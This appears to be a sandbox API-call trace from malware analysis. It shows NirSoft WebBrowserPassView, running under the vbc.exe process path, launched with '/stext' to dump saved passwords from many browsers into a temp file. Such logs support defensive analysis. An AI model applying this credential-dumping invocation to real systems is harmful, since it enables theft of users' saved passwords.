returned="NirSoft Freeware. " [0066.909] wcsncat (in: _Dest=0x19d26a, _Source=" ", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="h", _Count=0x1 | out: _Dest="NirSoft Freeware. h") returned="NirSoft Freeware. h" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. ht") returned="NirSoft Freeware. ht" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. htt") returned="NirSoft Freeware. htt" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="p", _Count=0x1 | out: _Dest="NirSoft Freeware. http") returned="NirSoft Freeware. http" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source=":", _Count=0x1 | out: _Dest="NirSoft Freeware. http:") returned="NirSoft Freeware. http:" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="/", _Count=0x1 | out: _Dest="NirSoft Freeware. http:/") returned="NirSoft Freeware. http:/" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="/", _Count=0x1 | out: _Dest="NirSoft Freeware. http://") returned="NirSoft Freeware. http://" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freeware. http://w") returned="NirSoft Freeware. http://w" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freeware. http://ww") returned="NirSoft Freeware. http://ww" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www") returned="NirSoft Freeware. http://www" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source=".", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.") returned="NirSoft Freeware. http://www." [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="n", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.n") returned="NirSoft Freeware. http://www.n" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="i", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.ni") returned="NirSoft Freeware. http://www.ni" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="r", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nir") returned="NirSoft Freeware. http://www.nir" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="s", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirs") returned="NirSoft Freeware. http://www.nirs" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="o", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirso") returned="NirSoft Freeware. http://www.nirso" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="f", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsof") returned="NirSoft Freeware. http://www.nirsof" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft") returned="NirSoft Freeware. http://www.nirsoft" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source=".", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.") returned="NirSoft Freeware. http://www.nirsoft." [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="n", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.n") returned="NirSoft Freeware. http://www.nirsoft.n" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="e", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.ne") returned="NirSoft Freeware. http://www.nirsoft.ne" [0066.910] wcsncat (in: _Dest=0x19d26a, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.net") returned="NirSoft Freeware. http://www.nirsoft.net" [0066.910] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.910] LoadIconW (hInstance=0x400000, lpIconName=0x65) returned 0x40211 [0066.911] wcscpy (in: _Dest=0x19cde4, _Source="WebBrowserPassView" | out: _Dest="WebBrowserPassView") returned="WebBrowserPassView" [0066.911] wcslen (_String="/stext") returned 0x6 [0066.911] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned 0x34 [0066.912] _wcsicmp (_String1="/savelangfile", _String2="/stext") returned -19 [0066.912] _wcsicmp (_String1="/savelangfile", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.912] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19cb6c, nSize=0x104 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) returned 0x35 [0066.912] wcscat (in: _Dest=0x19cb6c, _Source="_lng.ini" | out: _Dest="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc_lng.ini") returned="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc_lng.ini" [0066.912] GetFileAttributesW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc_lng.ini" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc_lng.ini")) returned 0xffffffff [0066.912] _wcsicmp (_String1="/deleteregkey", _String2="/stext") returned -15 [0066.912] _wcsicmp (_String1="/deleteregkey", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.912] LoadStringW (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="URL") returned 0x3 [0066.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.913] LoadStringW (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="URL") returned 0x3 [0066.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.913] LoadStringW (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Web Browser") returned 0xb [0066.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.913] LoadStringW (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Web Browser") returned 0xb [0066.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.913] LoadStringW (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="User Name") returned 0x9 [0066.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.913] LoadStringW (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="User Name") returned 0x9 [0066.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.913] LoadStringW (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0066.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.913] LoadStringW (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0066.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.914] LoadStringW (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0066.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.914] LoadStringW (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0066.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.914] LoadStringW (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="User Name Field") returned 0xf [0066.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.914] LoadStringW (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="User Name Field") returned 0xf [0066.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.914] LoadStringW (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Password Field") returned 0xe [0066.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.914] LoadStringW (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Password Field") returned 0xe [0066.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.914] LoadStringW (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Created Time") returned 0xc [0066.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.914] LoadStringW (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Created Time") returned 0xc [0066.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.915] LoadStringW (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Modified Time") returned 0xd [0066.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.915] LoadStringW (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Modified Time") returned 0xd [0066.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.915] LoadStringW (in: hInstance=0x400000, uID=0x3f2, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Filename") returned 0x8 [0066.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.915] LoadStringW (in: hInstance=0x400000, uID=0x3f2, lpBuffer=0x8a7948, cchBufferMax=4095 | out: lpBuffer="Filename") returned 0x8 [0066.915] _wcsicmp (_String1="/stext", _String2="/stext") returned 0 [0066.915] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19cb44, nSize=0x104 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) returned 0x35 [0066.915] wcscat (in: _Dest=0x19cb44, _Source=".cfg" | out: _Dest="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" [0066.916] wcscpy (in: _Dest=0x19c730, _Source="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" | out: _Dest="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" [0066.916] wcscpy (in: _Dest=0x19c93a, _Source="General" | out: _Dest="General") returned="General" [0066.916] GetPrivateProfileIntW (lpAppName="General", lpKeyName="ShowGridLines", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.916] GetPrivateProfileIntW (lpAppName="General", lpKeyName="SaveFilterIndex", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.916] GetPrivateProfileIntW (lpAppName="General", lpKeyName="ShowInfoTip", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.916] GetPrivateProfileIntW (lpAppName="General", lpKeyName="MarkOddEvenRows", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.916] GetPrivateProfileIntW (lpAppName="General", lpKeyName="ShowTimeInGMT", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.916] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsIE", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.916] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsFirefox", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.916] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsChrome", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.917] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsOpera", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.917] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsSafari", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.917] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsSeaMonkey", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.917] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsYandex", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.917] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsVivaldi", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.917] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseFirefoxProfileFolder", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.917] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseFirefoxInstallFolder", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.917] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseChromeProfileFolder", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.917] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseOperaPasswordFile", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.919] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="FirefoxProfileFolder", lpDefault="", lpReturnedString=0x8a3c7c, nSize=0x104, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" | out: lpReturnedString="") returned 0x0 [0066.919] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="FirefoxInstallFolder", lpDefault="", lpReturnedString=0x8a3e86, nSize=0x104, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" | out: lpReturnedString="") returned 0x0 [0066.919] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="ChromeProfileFolder", lpDefault="", lpReturnedString=0x8a4294, nSize=0x104, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" | out: lpReturnedString="") returned 0x0 [0066.919] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="OperaPasswordFile", lpDefault="", lpReturnedString=0x8a44a4, nSize=0x104, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" | out: lpReturnedString="") returned 0x0 [0066.920] GetPrivateProfileIntW (lpAppName="General", lpKeyName="SaveFileEncoeding", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.920] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseQuickFilter", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.920] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="QuickFilterString", lpDefault="", lpReturnedString=0x8a46b4, nSize=0xfff, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" | out: lpReturnedString="") returned 0x0 [0066.920] GetPrivateProfileIntW (lpAppName="General", lpKeyName="QuickFilterColumnsMode", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.920] GetPrivateProfileIntW (lpAppName="General", lpKeyName="QuickFilterFindMode", nDefault=1, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x1 [0066.920] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="WinPos", lpDefault="", lpReturnedString=0x1986dc, nSize=0x2000, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" | out: lpReturnedString="") returned 0x0 [0066.920] wcslen (_String="") returned 0x0 [0066.920] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="Columns", lpDefault="", lpReturnedString=0x1986dc, nSize=0x2000, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" | out: lpReturnedString="") returned 0x0 [0066.920] wcslen (_String="") returned 0x0 [0066.920] GetPrivateProfileIntW (lpAppName="General", lpKeyName="Sort", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0066.920] wcscat (in: _Dest=0x19cb10, _Source="ShowGridLines" | out: _Dest="/ShowGridLines") returned="/ShowGridLines" [0066.921] _wcsicmp (_String1="/ShowGridLines", _String2="/stext") returned -12 [0066.921] _wcsicmp (_String1="/ShowGridLines", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="SaveFilterIndex" | out: _Dest="/SaveFilterIndex") returned="/SaveFilterIndex" [0066.921] _wcsicmp (_String1="/SaveFilterIndex", _String2="/stext") returned -19 [0066.921] _wcsicmp (_String1="/SaveFilterIndex", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="ShowInfoTip" | out: _Dest="/ShowInfoTip") returned="/ShowInfoTip" [0066.921] _wcsicmp (_String1="/ShowInfoTip", _String2="/stext") returned -12 [0066.921] _wcsicmp (_String1="/ShowInfoTip", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="MarkOddEvenRows" | out: _Dest="/MarkOddEvenRows") returned="/MarkOddEvenRows" [0066.921] _wcsicmp (_String1="/MarkOddEvenRows", _String2="/stext") returned -6 [0066.921] _wcsicmp (_String1="/MarkOddEvenRows", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="ShowTimeInGMT" | out: _Dest="/ShowTimeInGMT") returned="/ShowTimeInGMT" [0066.921] _wcsicmp (_String1="/ShowTimeInGMT", _String2="/stext") returned -12 [0066.921] _wcsicmp (_String1="/ShowTimeInGMT", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="LoadPasswordsIE" | out: _Dest="/LoadPasswordsIE") returned="/LoadPasswordsIE" [0066.921] _wcsicmp (_String1="/LoadPasswordsIE", _String2="/stext") returned -7 [0066.921] _wcsicmp (_String1="/LoadPasswordsIE", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="LoadPasswordsFirefox" | out: _Dest="/LoadPasswordsFirefox") returned="/LoadPasswordsFirefox" [0066.921] _wcsicmp (_String1="/LoadPasswordsFirefox", _String2="/stext") returned -7 [0066.921] _wcsicmp (_String1="/LoadPasswordsFirefox", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="LoadPasswordsChrome" | out: _Dest="/LoadPasswordsChrome") returned="/LoadPasswordsChrome" [0066.921] _wcsicmp (_String1="/LoadPasswordsChrome", _String2="/stext") returned -7 [0066.921] _wcsicmp (_String1="/LoadPasswordsChrome", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="LoadPasswordsOpera" | out: _Dest="/LoadPasswordsOpera") returned="/LoadPasswordsOpera" [0066.921] _wcsicmp (_String1="/LoadPasswordsOpera", _String2="/stext") returned -7 [0066.921] _wcsicmp (_String1="/LoadPasswordsOpera", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="LoadPasswordsSafari" | out: _Dest="/LoadPasswordsSafari") returned="/LoadPasswordsSafari" [0066.921] _wcsicmp (_String1="/LoadPasswordsSafari", _String2="/stext") returned -7 [0066.921] _wcsicmp (_String1="/LoadPasswordsSafari", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="LoadPasswordsSeaMonkey" | out: _Dest="/LoadPasswordsSeaMonkey") returned="/LoadPasswordsSeaMonkey" [0066.921] _wcsicmp (_String1="/LoadPasswordsSeaMonkey", _String2="/stext") returned -7 [0066.921] _wcsicmp (_String1="/LoadPasswordsSeaMonkey", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="LoadPasswordsYandex" | out: _Dest="/LoadPasswordsYandex") returned="/LoadPasswordsYandex" [0066.921] _wcsicmp (_String1="/LoadPasswordsYandex", _String2="/stext") returned -7 [0066.921] _wcsicmp (_String1="/LoadPasswordsYandex", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="LoadPasswordsVivaldi" | out: _Dest="/LoadPasswordsVivaldi") returned="/LoadPasswordsVivaldi" [0066.921] _wcsicmp (_String1="/LoadPasswordsVivaldi", _String2="/stext") returned -7 [0066.921] _wcsicmp (_String1="/LoadPasswordsVivaldi", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.921] wcscat (in: _Dest=0x19cb10, _Source="UseFirefoxProfileFolder" | out: _Dest="/UseFirefoxProfileFolder") returned="/UseFirefoxProfileFolder" [0066.923] _wcsicmp (_String1="/UseFirefoxProfileFolder", _String2="/stext") returned 2 [0066.923] _wcsicmp (_String1="/UseFirefoxProfileFolder", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.923] wcscat (in: _Dest=0x19cb10, _Source="UseFirefoxInstallFolder" | out: _Dest="/UseFirefoxInstallFolder") returned="/UseFirefoxInstallFolder" [0066.923] _wcsicmp (_String1="/UseFirefoxInstallFolder", _String2="/stext") returned 2 [0066.923] _wcsicmp (_String1="/UseFirefoxInstallFolder", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb10, _Source="UseChromeProfileFolder" | out: _Dest="/UseChromeProfileFolder") returned="/UseChromeProfileFolder" [0066.924] _wcsicmp (_String1="/UseChromeProfileFolder", _String2="/stext") returned 2 [0066.924] _wcsicmp (_String1="/UseChromeProfileFolder", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb10, _Source="UseOperaPasswordFile" | out: _Dest="/UseOperaPasswordFile") returned="/UseOperaPasswordFile" [0066.924] _wcsicmp (_String1="/UseOperaPasswordFile", _String2="/stext") returned 2 [0066.924] _wcsicmp (_String1="/UseOperaPasswordFile", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb0c, _Source="FirefoxProfileFolder" | out: _Dest="/FirefoxProfileFolder") returned="/FirefoxProfileFolder" [0066.924] _wcsicmp (_String1="/FirefoxProfileFolder", _String2="/stext") returned -13 [0066.924] _wcsicmp (_String1="/FirefoxProfileFolder", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb0c, _Source="FirefoxInstallFolder" | out: _Dest="/FirefoxInstallFolder") returned="/FirefoxInstallFolder" [0066.924] _wcsicmp (_String1="/FirefoxInstallFolder", _String2="/stext") returned -13 [0066.924] _wcsicmp (_String1="/FirefoxInstallFolder", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb0c, _Source="ChromeProfileFolder" | out: _Dest="/ChromeProfileFolder") returned="/ChromeProfileFolder" [0066.924] _wcsicmp (_String1="/ChromeProfileFolder", _String2="/stext") returned -16 [0066.924] _wcsicmp (_String1="/ChromeProfileFolder", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb0c, _Source="OperaPasswordFile" | out: _Dest="/OperaPasswordFile") returned="/OperaPasswordFile" [0066.924] _wcsicmp (_String1="/OperaPasswordFile", _String2="/stext") returned -4 [0066.924] _wcsicmp (_String1="/OperaPasswordFile", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb10, _Source="SaveFileEncoeding" | out: _Dest="/SaveFileEncoeding") returned="/SaveFileEncoeding" [0066.924] _wcsicmp (_String1="/SaveFileEncoeding", _String2="/stext") returned -19 [0066.924] _wcsicmp (_String1="/SaveFileEncoeding", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb10, _Source="UseQuickFilter" | out: _Dest="/UseQuickFilter") returned="/UseQuickFilter" [0066.924] _wcsicmp (_String1="/UseQuickFilter", _String2="/stext") returned 2 [0066.924] _wcsicmp (_String1="/UseQuickFilter", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb0c, _Source="QuickFilterString" | out: _Dest="/QuickFilterString") returned="/QuickFilterString" [0066.924] _wcsicmp (_String1="/QuickFilterString", _String2="/stext") returned -2 [0066.924] _wcsicmp (_String1="/QuickFilterString", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb10, _Source="QuickFilterColumnsMode" | out: _Dest="/QuickFilterColumnsMode") returned="/QuickFilterColumnsMode" [0066.924] _wcsicmp (_String1="/QuickFilterColumnsMode", _String2="/stext") returned -2 [0066.924] _wcsicmp (_String1="/QuickFilterColumnsMode", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] wcscat (in: _Dest=0x19cb10, _Source="QuickFilterFindMode" | out: _Dest="/QuickFilterFindMode") returned="/QuickFilterFindMode" [0066.924] _wcsicmp (_String1="/QuickFilterFindMode", _String2="/stext") returned -2 [0066.924] _wcsicmp (_String1="/QuickFilterFindMode", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] _wcsicmp (_String1="/sort", _String2="/stext") returned -5 [0066.924] _wcsicmp (_String1="/sort", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0066.924] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0066.924] SetCursor (hCursor=0x10007) returned 0x10007 [0066.925] GetVersionExW (in: lpVersionInformation=0x452e28*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x452e28*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0066.925] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x198030, csidl=34, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0066.928] wcslen 